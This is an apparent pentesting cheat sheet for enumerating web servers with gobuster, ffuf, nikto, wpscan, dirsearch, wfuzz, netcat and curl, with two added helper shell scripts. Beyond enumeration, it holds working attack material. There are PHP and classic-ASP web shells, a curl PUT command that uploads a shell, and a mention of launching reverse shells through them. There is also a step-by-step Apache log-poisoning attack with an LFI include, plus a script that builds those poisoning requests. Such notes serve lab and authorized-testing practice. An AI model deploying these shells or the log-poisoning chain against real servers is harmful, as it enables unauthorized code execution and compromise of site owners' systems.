HTTP Enum
Enumerate directories.
The main thing to remember here is to always run against multiple wordlists, starting with directory-list-2.3-medium.txt, and to re-run with file extensions (-x / -e) once you know the backend technology (php, aspx, jsp ...).
Gobuster
# URL Search
-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux
-- Comprehensive Directory Busting (-s whitelists status codes; gobuster 3.1+ also needs -b '' to clear the default 404 blacklist, otherwise it refuses to start)
gobuster dir -s 200,204,301,302,307,403 -b '' -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
-- Search with File Extension (-x appends every extension to every word, so the wordlist is tried 5 times here)
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php
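The "run against multiple wordlists" advice above as a small wrapper. This is an added example, not part of the original cheat sheet: it runs gobuster dir once per wordlist (skipping lists that are not installed), keeps one output file per list and merges the hits at the end. The wordlist paths are the Kali defaults and are assumptions; DRY_RUN, bust_all and merge_hits are names chosen here.

```shell
#!/bin/sh
# Added example (not part of the original cheat sheet): run gobuster dir
# against several wordlists in turn, one output file per wordlist, so hits
# from a later list are never lost. Paths are assumed Kali defaults.

# Wordlists in the order they are tried (whitespace separated, no spaces in paths)
WORDLISTS="/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/Web-Content/big.txt"

BUST_COUNT=0   # number of wordlists actually used by the last bust_all call

# bust_all URL OUTDIR [EXTENSIONS]
# Skips wordlists that do not exist and writes OUTDIR/<wordlist>.gobuster
# for each one. With DRY_RUN=1 it prints the command lines instead of
# running gobuster (useful to review before launching against a target).
bust_all() {
  url=$1; outdir=$2; ext=${3:-php,txt,html}
  BUST_COUNT=0
  mkdir -p "$outdir"
  for wl in $WORDLISTS; do
    if [ ! -r "$wl" ]; then
      echo "skip (missing): $wl" >&2
      continue
    fi
    out="$outdir/$(basename "$wl" .txt).gobuster"
    BUST_COUNT=$((BUST_COUNT + 1))
    if [ "${DRY_RUN:-0}" = 1 ]; then
      echo "gobuster dir -u $url -w $wl -x $ext -t 40 -o $out"
    else
      # -t 40 threads; -x appends each extension; a failing run does not abort the loop
      gobuster dir -u "$url" -w "$wl" -x "$ext" -t 40 -o "$out" \
        || echo "gobuster failed on $wl" >&2
    fi
  done
}

# merge_hits OUTDIR: union of every path found across all output files.
# gobuster -o lines look like "/admin    (Status: 301) [Size: 312]", so
# the first field is the path.
merge_hits() {
  cat "$1"/*.gobuster 2>/dev/null | awk '{print $1}' | sort -u
}

# Usage (dry run first to see what will be launched):
# DRY_RUN=1 bust_all http://10.10.10.10 ./bust
# bust_all http://10.10.10.10 ./bust .php,.txt && merge_hits ./bust
```

Because each list writes its own file, a crashed or interrupted run only costs that one list; merge_hits is what you feed into the next step (manual browsing, nikto on specific paths, and so on).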
==========================================================================================================================================================================================
# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt
==========================================================================================================================================================================================
# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt --append-domain   # gobuster 3.2+: without --append-domain the bare word is sent as the Host header
FFUF
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"   # -ic skips the comment lines at the top of directory-list-2.3-medium.txt
Nikto Web Scan
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081 # Multiple ports
nikto -h 10.10.10.10 -p 80-88 # Port range
Wordpress Scan
wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/
wpscan --url http://10.10.10.10/wp/ --enumerate u,vp,vt   # wpscan 3.x uses --url (not -u); combine the switches below with commas
**** User ****
u: enumerate users
**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins
**** Themes Switches ****
t: Popular themes only
vt: Vulnerable themes only
at: All themes
Drupal
droopescan scan drupal -u http://10.10.10.10/ -t 32
Joomla
joomscan -u http://10.10.10.10/
Dirb
dirb http://10.10.10.x
******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats
dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
-x : append every extension in extensions_common.txt to every word of big.txt
Dirsearch
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>
Example
python3 dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
-u: URL to scan.
-e: file extensions to look for (comma-separated).
-w: wordlist.
Netcat (manual requests: finish each request with an empty line, i.e. press Enter twice; HTTP/1.1 would additionally need a "Host:" header)
nc 10.10.10.10 80
HEAD / HTTP/1.0

GET / HTTP/1.0
cUrl
# Header
curl -i INSERTIPADDRESS
# Everything else
curl -i -L INSERTIPADDRESS
# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq
# Upload possible? Look for PUT in the Allow: header (and for a DAV: header) of the OPTIONS reply
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT --data-binary '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php   # 201 Created means it landed; then request shell.php?cmd=id
Wfuzz
----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php
----URL testing (fuzz a numeric parameter 0-10; --hl 97 hides responses with 97 lines, i.e. the "not found" page)----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ
----DNS fuzzing (virtual hosts through the Host header; -f writes results to a file, --hl/--hh hide the default vhost's response by line/char count)----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62
Upload a PHP file
If you can upload a file, try one of the below and call it with ?cmd=id. The same parameter can launch a reverse shell (e.g. a bash or nc one-liner).
<?php echo system($_GET["cmd"]);?>
OR
<?php echo shell_exec($_GET["cmd"]);?>
WebDav
davtest -url http://10.10.10.10 <-- Tests which file extensions can be uploaded and which of them execute
cadaver http://10.10.10.10/ <-- Interactive WebDAV client (put/get/delete)
Classic ASP Webshell (VBScript, for .asp pages; an .aspx page needs C#/VB.NET code instead)
<%
' WScript.Shell runs the command; Exec returns an object whose StdOut holds the output
Set sh = CreateObject("WScript.Shell")
Set cmd = sh.Exec("cmd /c whoami")  ' swap the literal for Request.QueryString("cmd") to take the command from the URL
o = cmd.StdOut.ReadAll()
Response.Write(o)
%>
Code Execution through HTTP/LFI (log poisoning)
Connect with netcat and send the PHP stager as the request line, then press Enter twice. The server will most likely answer 400 Bad Request, but the line is still written to access.log. Do not type it into a browser: the < and > get URL-encoded and the tag is useless. Keep the single quotes around cmd, Apache escapes double quotes in log entries as \" which breaks the PHP.
nc 10.10.10.10 80
<?php system($_GET['cmd']); ?>
==========================================================================
Then include the log through the LFI you discovered and append the cmd variable:
?cmd=id
&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami
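The Netcat and log-poisoning sections above, scripted. This is an added example and not part of the original cheat sheet: raw_request builds the exact bytes netcat should send (CRLF line endings, terminating empty line), poison_request puts the stager in the User-Agent (logged verbatim by Apache's combined format) and lfi_url builds the include URL. Host values, the function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: builds the raw requests
# for the Netcat and log-poisoning sections and the matching LFI URL.
# IPs and the sample log lines below are made up for illustration.

# raw_request METHOD PATH HOST [USER_AGENT]
# Emits a complete HTTP/1.0 request with CRLF line endings and the empty line
# that terminates the headers, ready to pipe into nc:
#   raw_request HEAD / 10.10.10.10 | nc 10.10.10.10 80
raw_request() {
  printf '%s %s HTTP/1.0\r\n' "$1" "$2"
  printf 'Host: %s\r\n' "$3"
  printf 'User-Agent: %s\r\n' "${4:-Mozilla/5.0}"
  printf 'Connection: close\r\n\r\n'
}

# PHP stager for log poisoning. Single quotes around cmd on purpose: Apache
# escapes double quotes in log entries as \", which would turn the stager
# into a PHP parse error once it is include()d from access.log.
PHP_STAGER="<?php system(\$_GET['cmd']); ?>"

# poison_request HOST: put the stager in User-Agent; the combined log format
# writes the UA verbatim into access.log, and sending it through nc avoids
# the URL-encoding a browser would apply ('<' becomes %3C and the tag is dead).
poison_request() {
  raw_request GET / "$1" "$PHP_STAGER"
}

# lfi_url BASE PARAM DEPTH CMD: include the poisoned log through the LFI
# parameter with DEPTH '../' steps, passing CMD in the cmd parameter.
lfi_url() {
  trav=""; i=0
  while [ "$i" -lt "$3" ]; do trav="$trav../"; i=$((i + 1)); done
  printf '%s?%s=%svar/log/apache2/access.log&cmd=%s\n' "$1" "$2" "$trav" "$4"
}

# Constructed Apache combined-format lines: the first is what poison_request
# produces, the second is the same stager typed into a browser's address bar.
SAMPLE_LOG="10.10.14.5 - - [01/Jan/2024:12:00:00 +0000] \"GET / HTTP/1.0\" 200 612 \"-\" \"<?php system(\$_GET['cmd']); ?>\"
10.10.14.5 - - [01/Jan/2024:12:00:01 +0000] \"GET /%3C?php%20system(\$_GET['cmd']);%20?%3E HTTP/1.1\" 404 196 \"-\" \"Mozilla/5.0\""

# count_stagers LOGTEXT: number of lines that still contain an intact '<?php' tag
count_stagers() {
  printf '%s\n' "$1" | grep -c '<?php'
}

# Usage:
# poison_request 10.10.10.10 | nc 10.10.10.10 80
# curl "$(lfi_url http://10.10.10.10/somedir/lfi.php file 3 id)"
```

Only the first sample line would execute when the log is included; the browser-encoded one is just text. If the target runs nginx the log path changes (/var/log/nginx/access.log) and the DEPTH argument is whatever number of ../ it takes to reach / from the include's working directory.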